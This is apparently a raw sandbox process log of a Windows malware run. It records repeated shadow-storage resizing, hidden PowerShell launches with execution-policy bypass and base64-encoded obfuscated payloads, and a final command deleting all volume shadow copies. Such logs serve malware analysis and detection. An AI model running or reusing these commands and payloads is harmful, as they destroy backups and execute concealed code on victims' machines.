cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
134
952
vssadmin.exe
4012
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
135
5000
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Process
136
5048
vssadmin.exe
5000
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
137
3664
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
138
3984
vssadmin.exe
3664
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
139
4052
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
140
4552
vssadmin.exe
4052
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
141
3872
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
142
1416
vssadmin.exe
3872
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
143
5080
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
144
3292
vssadmin.exe
5080
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
145
8
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
146
176
vssadmin.exe
8
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
147
4504
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
148
652
vssadmin.exe
4504
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
149
4664
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
150
360
vssadmin.exe
4664
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
151
4876
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
152
2540
vssadmin.exe
4876
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
153
4960
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
154
1308
vssadmin.exe
4960
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
155
2616
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
156
3436
vssadmin.exe
2616
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
157
1276
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
158
3592
vssadmin.exe
1276
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
159
4892
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
160
4424
vssadmin.exe
4892
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
161
3288
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Process
162
700
vssadmin.exe
3288
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
163
3316
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JAB5AD0AIgBLAEMAYwBnAEoAaQBnAGcASwBGAHMAbgBLAHkAZAB6AFYARgBKAEoASgB5AHMAbgBiAGsAYwBuAEsAeQBkAGQATgBpAGMAcgBKADIAVgBRAGQAawBWAFMAUQBrADgAbgBLAHkAZABUAFIAVgBCAHkAWgBTAGMAcgBKADIAWgBGAGMAbQBWAE8ASgB5AHMAbgBZADAAVQBwAEoAeQBzAG4AVwB5AGMAcgBKAHoARQBzAE0AMQAwAG4ASwB5AGMAcgBSAFUAbABaAFcARQBWAEoAVwBTADEASwBiADIAbAB1AEoAeQBzAG4AUgBVAGwAWgBSAFUAawBuAEsAeQBkAFoASwBTAEEAbgBLAHkAYwBvAEkARQA1AEYAVgB5ADAAbgBLAHkAZABQAFkAawBwAGwAWQAzAFEAbgBLAHkAYwBnAFUAMwBsAHoAZABFAFYATgBMAGsAbABQAEoAeQBzAG4ATABpAGMAcgBKADAATgBQAEoAeQBzAG4AVABYAEIAeQBKAHkAcwBuAFoAVgBOAHoAYQBVADkATwBMAG0AUgBGAFoAbQB4AEIAZABDAGMAcgBKADAAVgBUAFYASABKAEYAUQBVADAAbwBXADIAbABQAEoAeQBzAG4ATABtADEAbABiAFMAYwByAEoAMAA5AFMASgB5AHMAbgBlAFMAYwByAEoAMwBNAG4ASwB5AGQAMABVAG0AVgBCAEoAeQBzAG4AYgBWADAAZwBKAHkAcwBuAFcAMABNAG4ASwB5AGQAdgBUAGwAWgBGAGMAaQBjAHIASgAxAFIAZABPAGoAcABtAFUAawA5AE4AWQBtAEYAegBSAFQAWQAwAEoAeQBzAG4AYwAxAFIAUwBTAFUANQBuAEsARQBVAG4ASwB5AGQASgBXAFUAUQBuAEsAeQBkAGoAVgBsAEoARQBhADAARgAzAFIAVQBGAFkAUQBYAEUAeQBlAGoAWgBaAFYAVwB3AG4ASwB5AGQAUgBTAEUAMQBSAFoARABKAEkATQBVADUASwBTADEAWgBLAGIARgBwAEQAYgBTAGMAcgBKADIAUQByAFoARwA1AHcASgB5AHMAbgBjAFgAQgBPAGIAbQB0AHYAWgBWAE4AbwBOAGsAeAB2AFkAegBWADQAYQBTAGMAcgBKADAAYwBuAEsAeQBjADMAZQBrADkASQBkAEgAVgBIAFUAVABrAHIASgB5AHMAbgBTAEYAUgBrAFYAWABNADEAVgBTADkASgBOADMAVgBUAFIAbABaAHcAUgBtADkAVwBKAHkAcwBuAGMAMgBsAGwAZQBVAHAAUwBWAG4ASgBxAGIARABoAHgAYgBGAEYAbwBTAFYARgBpAE8ARwBOAFgAZQBIAEoAQwBOAFUAdABqAGUAawBFAG4ASwB5AGQAbQBKAHkAcwBuAFIAVQBsAFoASgB5AHMAbgBJAEMAawBzAEoAeQBzAG4ASQBGAHQAcABUAHkANQBqAGIAMgAxAHcAVQBtAFUAbgBLAHkAZABUAFUAMgBsAFAASgB5AHMAbgBiAGkAYwByAEoAeQA1AGoASgB5AHMAbgBiADAAMQBRAGMAawBWAFQAYwAwAGwAUABiAGsAMQB2AFIARwBWAGQATwBqAG8AbgBLAHkAZABFAFoAUwBjAHIASgAwAE0AbgBLAHkAZABQAFQAVgBCAFMAWgBYAE4AVABJAEMAawBnAFUAWABSADMASQBDAGMAcgBKAHkAVQBuAEsAeQBkADcASQBFADUARgBKAHkAcwBuAFYAeQAxAFAAWQBrAHAAbABZAHkAYwByAEoAMwBRAGcAVQAxAGwAegBkAEcAVgB0AEwAawBsAHYASgB5AHMAbgBMAGwATgAwAGMAbQBWAGgAYgBWAEoAbABZAFUAUgBsAFUAaQBnAG4ASwB5AGMAMgBaAFYAQgBmAEwAQwBCAGIAVQB5AGMAcgBKADEAawBuAEsAeQBkAHoAVgBFAFUAbgBLAHkAZAB0AEwAbgBSAEYAZQBIAFEAdQBSAFcANABuAEsAeQBkAEQAYgB5AGMAcgBKADIAUgBKAFQAbQBkAGQASgB5AHMAbgBPAGoAcABCAFUAMgBNAG4ASwB5AGQASgBTAFMAQQBwAEkAQwBjAHIASgAzADAAZwBKAHkAcwBuAEsAUwBjAHIASgB5ADUAUwBaAFUARgBFAGQARQA5AGwAVABpAGMAcgBKADAAUQBvAEkAQwBrAGcASgB5AGsAdQBVAGsAVgB3AFQARQBGAGoAUgBTAGcAbgBOAG0AVgBRAEoAeQB4AGIAYwAxAFIAeQBhAFcANQBuAFgAVgB0AGoAYQBHAEYAUwBYAFQATQAyAEsAUwA1AFMAUgBYAEIATQBRAFcATgBGAEsAQwBkAEYAUwBWAGsAbgBMAEYAdAB6AFYASABKAHAAYgBtAGQAZABXADIATgBvAFkAVgBKAGQATQB6AGsAcABMAGwASgBGAGMARQB4AEIAWQAwAFUAbwBKADEARgAwAGQAeQBjAHMASgAzAHcAbgBLAFgAdwBnAEoAaQBnAGcASgBGAE4AbwBaAFcAeABzAGEAVQBSAGIATQBWADAAcgBKAEgATgBvAFoAVQB4AE0AUwBVAFIAYgBNAFQATgBkAEsAeQBkAFkASgB5AGsAPQAiAA0ACgAkAHoAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB5ACkAKQANAAoASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAB6AA==
ď脌瓈
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
164
1820
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABhADEAPQAiAEoAaQBnAGcASwBGAHQAegBkAEYASgBKAGIAawBkAGQASgBIAFoARgBjAG0ASgB2AGMAMgBWAHcAVQBrAFYARwBSAFYASgBsAGIAawBOAEYASwBWAHMAeABMAEQATgBkAEsAeQBkAFkASgB5ADEAcQBiADAAbAB1AEoAeQBjAHAASwBDAEEAbwBKADIAawBuAEsAeQBkAHUAZABtADkAcgBSAFMAYwByAEoAeQAxAGwAZQBGAEIAUwBaAFgATgB6AGEAVQA5AE8ASQBDAGcAZwBUAGkAYwByAEoAMgBWAFgATABVADkAQwBKAHkAcwBuAFMAawBWAEQAZABDAEIASgBiAHkAYwByAEoAeQA1AHoAVgBDAGMAcgBKADMASgBGAFkAVQAxAHkAWgBXAEYARQBaAFYASQBvAEsARQA0AG4ASwB5AGQAbABWAHkAMABuAEsAeQBkAFAAUQBrAHAARgBRADMAUQBnAFMAVwA4AHUASgB5AHMAbgBRADAAOQBOAFUARgBKAGwAYwAxAE4AcABiADAANAB1AFIARwBWAEcAVABHAEUAbgBLAHkAZABVAFIAWABNAG4ASwB5AGQAVQBVAG0AVgBoAFQAUwBnAGcAVwB5AGMAcgBKADIAawBuAEsAeQBkAHYATABtADEARgBiAFcAOQBTAGUAUwBjAHIASgAxAE4AVQBjAG0AVQBuAEsAeQBkAEIASgB5AHMAbgBiAFYAMQBiAGMAMQBsAFQAZABHAFYAdABKAHkAcwBuAEwAawBOAHYAVABpAGMAcgBKADEAWQBuAEsAeQBkAGwAYwBsAFIAZABPAGoAcABtAGMAaQBjAHIASgAyADgAbgBLAHkAZABOAFkAaQBjAHIASgAyAEUAbgBLAHkAZABUAFIAVABZADAAYwAzAFIAUwBTAFMAYwByAEoAMgA1AEgASwBDAEIAYQBhAFUAbABFAFkAMQBaAFMAUQAzAE4ASgBkADAAUgBCAFIAQwBjAHIASgAxAEYAeABOAEMAYwByAEoAMQBJAHIASgB5AHMAbgBNAGsARgBzAGMAWABCADYAWgBpAGMAcgBKADMARQB5AGEAMQBGAEQAYgBWAHAARgBiAFUASgBWAFoAaQBjAHIASgAzAEEAegBKAHkAcwBuAFoARABOAFEAWgBTAGMAcgBKAHoAVgBqAGIARwBwAE8AWQAyAE0AMgBlAEgAcABRAEoAeQBzAG4AUgAyAFUAbgBLAHkAZABDAEoAeQBzAG4AVAAxAFYAUwBkAFgAZwBuAEsAeQBkAHYAUgBEAE4AcABKAHkAcwBuAFQARwBWAEoASgB5AHMAbgBVAEYAUQBuAEsAeQBkADUASgB5AHMAbgBiAEMAYwByAEoAMgBVAG4ASwB5AGQAWgBXAFcAMQB3AGIAawBsAFgAZQBTAGMAcgBKADEAWQB3AFoAMABaADAAYgBFAHQANABjADIAdABOAGUAVwBSAEMAWgAxAFoATABXAEcAWgA0AFEAMQBwADEAYwBXADAAeQBaAG4AWQBuAEsAeQBjADUASgB5AHMAbgBiAEMAYwByAEoAMQBnAG4ASwB5AGQAbwBKAHkAcwBuAFkAMgBkAEQATAAxAEEANQBiADMAZABwAE0AVQBKAHQATgBsAEUAbgBLAHkAYwB3AGQAQwA5AEIAUgBUADEAYQBhAFUAawBnAEsAUwBBAG4ASwB5AGMAcwBXAHkAYwByAEoAMgBsAHYASgB5AHMAbgBMAG0ATgB2AFQAWABBAG4ASwB5AGQAUwBSAFgATQBuAEsAeQBkAFQAYQBXADkATwBMAGkAYwByAEoAMgBNAG4ASwB5AGQAUABiAFYAQgB5AFIAUwBjAHIASgAxAE0AbgBLAHkAZAB6AFMAVQA4AG4ASwB5AGQATwBiAFcAOQBrAFoAVgAwAG4ASwB5AGMANgBKAHkAcwBuAE8AaQBjAHIASgAwAFIAbABKAHkAcwBuAFkAMAA5AHQAYwBDAGMAcgBKADMASgBsAGMAMQBNAG4ASwB5AGMAcABJAEMAawBuAEsAeQBjAGcATABDAEIAYgBKAHkAcwBuAGMAMQBsAFQAZABHAFUAbgBLAHkAZABOAEwAbgBSAEYAZQBDAGMAcgBKADEAUQB1AFoAVwA1AEQAYgAyAFIASgBiAGsAZABkAE8AagBwAGgAYwAyAE4AcABTAFMAawBnAEsAUwA1AFMAWgBVAEYARQBkAEcAOQBGAFQAbQBRAG8ASQBDAGsAbgBLAHkAYwBnAEoAeQBrAHUAYwBtAFYAUQBUAEcARgBEAFIAUwBnAG4AVwBtAGwASgBKAHkAeABiAFUAMQBSAHkAUwBXADUASABYAFYAdABEAFMARQBGAFMAWABUAE0ANQBLAFMAawA9ACIADQAKACQAYgAxACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAHQAZgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQAxACkAKQANAAoASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABiADEA
脌瓈
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
165
4796
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABhADIAPQAiAEoAaQBBAG8ASwBFAGQAbABWAEMAMQAyAFkAWABKAEoAWQBVAEoAcwBaAFMAQQBuAEsAbQAxAEUAYwBpAG8AbgBLAFMANQBPAFEAVQAxAGwAVwB6AE0AcwBNAFQARQBzAE0AbAAwAHQAUwBtADkASgBiAGkAYwBuAEsAUwBBAG8ASwBDAGcAbgBKAGkAQQBvAEkASABFADAAYgBYAEIAegBhAEcAOABuAEsAeQBkAE4AWgBWAHMAMABYAFMAYwByAEoAeQB0AHgATgBHADEAUQBVADIAaABQAGIAVwBVAG4ASwB5AGQAYgBNAHoAUgBkAEsAMQBsAEoAUgBYAGcAbgBLAHkAZABaAFMAUwBjAHIASgAwAFUAcABLAEMAQQBuAEsAeQBkAHUASgB5AHMAbgBaAFgAYwB0AGIAMABKAHEAUgBVAE4AVQBJAEUAbAB2AEwAbQBNAG4ASwB5AGQAdgBiAFYAQgB5AFoAWABOAHoAUwBVADgAbgBLAHkAZAB1AEwAawBSAEYAUgBrAHgAQgBkAEcAVQBuAEsAeQBkAFQAZABIAEoAbABZAFUAMABvAFcAMABsAHYATABrADEAbABiAFUAOQBTAGUAWABNAG4ASwB5AGQAMABVAGkAYwByAEoAMABWAEIAYgBWADEAYgBRADIAOQBPAFYAawBWAHkAZABGADAANgBKAHkAcwBuAE8AawBaAFMAVAAyADAAbgBLAHkAZABDAFkAUwBjAHIASgAxAE4AbABOAGoAUQBuAEsAeQBkAHoAZABDAGMAcgBKADMASgBKAFQAbQBjAG8AVwBVAGwARgBUAEYAbAAwAGMAawBOAHoAVABYAGQARQBTAFUAOABuAEsAeQBkADIAVwBYAFoASwBhAG0ASgB0AFIAbQBSADEAYgBHAFUAegBKAHkAcwBuAFEAUwBjAHIASgB5AHMAbgBLAHkAZAAzAFIAMQBCAFYAUgBrAGwASQBKAHkAcwBuAFIAbABwAEoAVgBqAGsAbgBLAHkAZABpAEoAeQBzAG4AYwB5AGMAcgBKADAASgBqAFcAagBOAHUASgB5AHMAbgBNAFYAQQBuAEsAeQBjADIAVQBTADkAeABSAFcAdABFAFkAVgBZAG4ASwB5AGMAMABZAGoATgAzAFUAVwBKAG4AVgBrAEUAdwBNAEMAYwByAEoAMABVAG4ASwB5AGQAdwBUAEgAbABxAFMAQwBjAHIASgB5AHQARgBKAHkAcwBuAFYAeQBjAHIASgB6AFEAbgBLAHkAZAA2AFYARQBoAFIAVwBtADAAbgBLAHkAZAAzAEoAeQBzAG4AYQBHAGQAeABkAEUAdwBuAEsAeQBkADYAUQBqAGgARwBZAGoAWQBuAEsAeQBkAFYAVABTAGMAcgBKADEASQA1AGIARgBCAGEATgBrAFYANgBPAEUAdABrAGIAUwBjAHIASgAwAE4AYQBhAFUAZABOAGQAVQBSAHYASgB5AHMAbgBUAEQAaAB5AFcARQBwAHAASwAxAGQAbQBKAHkAcwBuAGIAUwBjAHIASgAwAEUAbgBLAHkAZABIAGUAVgBZADIAWQBWAEYATQBjAGwAVQBuAEsAeQBkAG4AUwAzAEkAMgBZAFcAdwAyAFIARABBAG4ASwB5AGQAMQBXAG4ATQB4AFUARABOAFoAZAAwAFIAeQBOAEYAawBuAEsAeQBkAFEATQBVAGcAbgBLAHkAZAAzAFAAVAAxAFoAUwBVAFUAZwBLAFMAQQBzAEoAeQBzAG4ASQBGAHQAegBXAFgATQBuAEsAeQBkADAAUgBXADAAdQBhAFcAOAB1AFEAMgA5AE4AVQBDAGMAcgBKADEASgBGAFUAMwBNAG4ASwB5AGQAcABUADAANAB1AFEAMgA5AHQAYwBGAEoAbABVADMATgBwAFQAMgA1AHQAVAAwAFIAbABYAFQAbwA2AFoARwBVAG4ASwB5AGQAagBiADAAMQBRAFUAawBWAFQASgB5AHMAbgBjAHkAYwByAEoAeQBBAHAAVgBGAFYAeABKAFgAdAB1AFoAWABjAHQAYgAwAEoAcQBSAFUATgBVAEoAeQBzAG4ASQBIAE4ANQBKAHkAcwBuAFUAMQBSAEYAYgBTAGMAcgBKAHkANQBKAEoAeQBzAG4AVAB5ADUAVABkAEYASgBsAFEAVwAxAHkAUgBXAEUAbgBLAHkAZABrAEoAeQBzAG4AWgBYAEkAbwBjAFQAUgB0AFgAeQBBAHMAVwAxAE4AWgBVADMAUgBGAFQAUwA1ADAAUgBTAGMAcgBKADMAZwBuAEsAeQBkAFUATABrAFYAdQBZADIAOQBrAGEAVwA1AG4ASgB5AHMAbgBYAFQAbwA2AFEAVgBOAEQAYQBVAGsAcABmAFMAawB1AFUAbQBWAEIAUgBIAFIAdgBKAHkAcwBuAFoAUwBjAHIASgAwADUAawBKAHkAcwBuAEsAQwBrAG4ASwBTAEEAdABVAG0AVgBRAFQARQBGAEQAWgBTAEEAbgBXAFUAbABGAEoAeQB4AGIAWQAwAGgAQgBVAGwAMAB6AE8AUwBBAGcATABVAE4AeQBaAFgAQgBNAFEAVwBOAGwASQBDAGQAeABOAEcAMABuAEwARgB0AGoAUwBFAEYAUwBYAFQATQAyAEkAQwBBAHQAUQAzAEoAbABjAEUAeABCAFkAMgBVAGcASgAxAFIAVgBjAFMAYwBzAFcAMgBOAEkAUQBWAEoAZABNAFQASQAwAEsAUwBrAD0AIgANAAoAJABiADIAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhADIAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGIAMgA=
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
166
1304
powershell.exe
4796
powershell.exe
PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABhADIAPQAiAEoAaQBBAG8ASwBFAGQAbABWAEMAMQAyAFkAWABKAEoAWQBVAEoAcwBaAFMAQQBuAEsAbQAxAEUAYwBpAG8AbgBLAFMANQBPAFEAVQAxAGwAVwB6AE0AcwBNAFQARQBzAE0AbAAwAHQAUwBtADkASgBiAGkAYwBuAEsAUwBBAG8ASwBDAGcAbgBKAGkAQQBvAEkASABFADAAYgBYAEIAegBhAEcAOABuAEsAeQBkAE4AWgBWAHMAMABYAFMAYwByAEoAeQB0AHgATgBHADEAUQBVADIAaABQAGIAVwBVAG4ASwB5AGQAYgBNAHoAUgBkAEsAMQBsAEoAUgBYAGcAbgBLAHkAZABaAFMAUwBjAHIASgAwAFUAcABLAEMAQQBuAEsAeQBkAHUASgB5AHMAbgBaAFgAYwB0AGIAMABKAHEAUgBVAE4AVQBJAEUAbAB2AEwAbQBNAG4ASwB5AGQAdgBiAFYAQgB5AFoAWABOAHoAUwBVADgAbgBLAHkAZAB1AEwAawBSAEYAUgBrAHgAQgBkAEcAVQBuAEsAeQBkAFQAZABIAEoAbABZAFUAMABvAFcAMABsAHYATABrADEAbABiAFUAOQBTAGUAWABNAG4ASwB5AGQAMABVAGkAYwByAEoAMABWAEIAYgBWADEAYgBRADIAOQBPAFYAawBWAHkAZABGADAANgBKAHkAcwBuAE8AawBaAFMAVAAyADAAbgBLAHkAZABDAFkAUwBjAHIASgAxAE4AbABOAGoAUQBuAEsAeQBkAHoAZABDAGMAcgBKADMASgBKAFQAbQBjAG8AVwBVAGwARgBUAEYAbAAwAGMAawBOAHoAVABYAGQARQBTAFUAOABuAEsAeQBkADIAVwBYAFoASwBhAG0ASgB0AFIAbQBSADEAYgBHAFUAegBKAHkAcwBuAFEAUwBjAHIASgB5AHMAbgBLAHkAZAAzAFIAMQBCAFYAUgBrAGwASQBKAHkAcwBuAFIAbABwAEoAVgBqAGsAbgBLAHkAZABpAEoAeQBzAG4AYwB5AGMAcgBKADAASgBqAFcAagBOAHUASgB5AHMAbgBNAFYAQQBuAEsAeQBjADIAVQBTADkAeABSAFcAdABFAFkAVgBZAG4ASwB5AGMAMABZAGoATgAzAFUAVwBKAG4AVgBrAEUAdwBNAEMAYwByAEoAMABVAG4ASwB5AGQAdwBUAEgAbABxAFMAQwBjAHIASgB5AHQARgBKAHkAcwBuAFYAeQBjAHIASgB6AFEAbgBLAHkAZAA2AFYARQBoAFIAVwBtADAAbgBLAHkAZAAzAEoAeQBzAG4AYQBHAGQAeABkAEUAdwBuAEsAeQBkADYAUQBqAGgARwBZAGoAWQBuAEsAeQBkAFYAVABTAGMAcgBKADEASQA1AGIARgBCAGEATgBrAFYANgBPAEUAdABrAGIAUwBjAHIASgAwAE4AYQBhAFUAZABOAGQAVQBSAHYASgB5AHMAbgBUAEQAaAB5AFcARQBwAHAASwAxAGQAbQBKAHkAcwBuAGIAUwBjAHIASgAwAEUAbgBLAHkAZABIAGUAVgBZADIAWQBWAEYATQBjAGwAVQBuAEsAeQBkAG4AUwAzAEkAMgBZAFcAdwAyAFIARABBAG4ASwB5AGQAMQBXAG4ATQB4AFUARABOAFoAZAAwAFIAeQBOAEYAawBuAEsAeQBkAFEATQBVAGcAbgBLAHkAZAAzAFAAVAAxAFoAUwBVAFUAZwBLAFMAQQBzAEoAeQBzAG4ASQBGAHQAegBXAFgATQBuAEsAeQBkADAAUgBXADAAdQBhAFcAOAB1AFEAMgA5AE4AVQBDAGMAcgBKADEASgBGAFUAMwBNAG4ASwB5AGQAcABUADAANAB1AFEAMgA5AHQAYwBGAEoAbABVADMATgBwAFQAMgA1AHQAVAAwAFIAbABYAFQAbwA2AFoARwBVAG4ASwB5AGQAagBiADAAMQBRAFUAawBWAFQASgB5AHMAbgBjAHkAYwByAEoAeQBBAHAAVgBGAFYAeABKAFgAdAB1AFoAWABjAHQAYgAwAEoAcQBSAFUATgBVAEoAeQBzAG4ASQBIAE4ANQBKAHkAcwBuAFUAMQBSAEYAYgBTAGMAcgBKAHkANQBKAEoAeQBzAG4AVAB5ADUAVABkAEYASgBsAFEAVwAxAHkAUgBXAEUAbgBLAHkAZABrAEoAeQBzAG4AWgBYAEkAbwBjAFQAUgB0AFgAeQBBAHMAVwAxAE4AWgBVADMAUgBGAFQAUwA1ADAAUgBTAGMAcgBKADMAZwBuAEsAeQBkAFUATABrAFYAdQBZADIAOQBrAGEAVwA1AG4ASgB5AHMAbgBYAFQAbwA2AFEAVgBOAEQAYQBVAGsAcABmAFMAawB1AFUAbQBWAEIAUgBIAFIAdgBKAHkAcwBuAFoAUwBjAHIASgAwADUAawBKAHkAcwBuAEsAQwBrAG4ASwBTAEEAdABVAG0AVgBRAFQARQBGAEQAWgBTAEEAbgBXAFUAbABGAEoAeQB4AGIAWQAwAGgAQgBVAGwAMAB6AE8AUwBBAGcATABVAE4AeQBaAFgAQgBNAFEAVwBOAGwASQBDAGQAeABOAEcAMABuAEwARgB0AGoAUwBFAEYAUwBYAFQATQAyAEkAQwBBAHQAUQAzAEoAbABjAEUAeABCAFkAMgBVAGcASgAxAFIAVgBjAFMAYwBzAFcAMgBOAEkAUQBWAEoAZABNAFQASQAwAEsAUwBrAD0AIgANAAoAJABiADIAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhADIAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGIAMgA=
C:\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
167
3848
forfiles.exe
1304
forfiles.exe
"C:\WINDOWS\system32\forfiles.exe" /c "cmd /c vssadmin Delete Shadows /all /quiet"
C:\
c:\windows\syswow64\forfiles.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Process
168
4588
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
